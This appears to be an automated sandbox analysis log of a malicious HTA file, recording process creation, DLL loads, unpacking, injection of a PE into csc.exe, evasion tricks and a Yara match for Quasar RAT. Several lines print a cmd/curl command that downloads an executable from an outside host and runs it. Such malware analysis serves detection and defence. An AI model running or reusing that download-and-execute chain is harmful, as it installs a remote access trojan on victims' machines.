Source: C:\Windows\SysWOW64\curl.exe

File created: C:\Users\user\Desktop\build.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_DT5aFgoH5h6bbtKq7Q
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\build.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -L https://mediafire.zip/build.exe -o build.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\build.exe build.exe
Source: C:\Users\user\Desktop\build.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -L https://mediafire.zip/build.exe -o build.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\build.exe build.exe	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: k7rn7l32.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: ntd3ll.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source:

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\build.exe

Unpacked PE file: 5.2.build.exe.1060000.2.unpack

Source: C:\Users\user\Desktop\build.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\build.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"			Jump to behavior

Source: build.exe.4.dr

Static PE information: real checksum: 0x2536d9 should be: 0x308742

Source: build.exe.4.dr

Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00593E24 push eax; ret	5_2_00593E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 9_2_066397C7 pushad ; retf	9_2_066397C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 9_2_0AE46DC8 push eax; retf	9_2_0AE46DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 9_2_0AE49D8F push dword ptr [esp+ecx*2-75h]; ret	9_2_0AE49D93

Source: C:\Windows\SysWOW64\curl.exe

File created: C:\Users\user\Desktop\build.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 6590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 6A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 6590000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\build.exe

Code function: 5_2_00427A40 rdtsc

5_2_00427A40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Window / User API: threadDelayed 967			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Window / User API: threadDelayed 8884			Jump to behavior

Source: C:\Users\user\Desktop\build.exe

API coverage: 4.9 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7252	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7252	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7240	Thread sleep count: 967 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7240	Thread sleep count: 8884 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: csc.exe, 00000009.00000002.2973144757.0000000009074000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: curl.exe, 00000004.00000003.1756430601.0000000002720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\build.exe

Code function: 5_2_00427A40 rdtsc

5_2_00427A40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\build.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4800000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\build.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4800000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\build.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4800000			Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4490008			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -L https://mediafire.zip/build.exe -o build.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\build.exe build.exe	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\build.exe

Code function: 5_2_00592716 cpuid

5_2_00592716

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\build.exe

Code function: 5_2_00593435 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00593435

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Quasar RAT

Source: Yara match	File source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 8136, type: MEMORYSTR

Remote Access Functionality

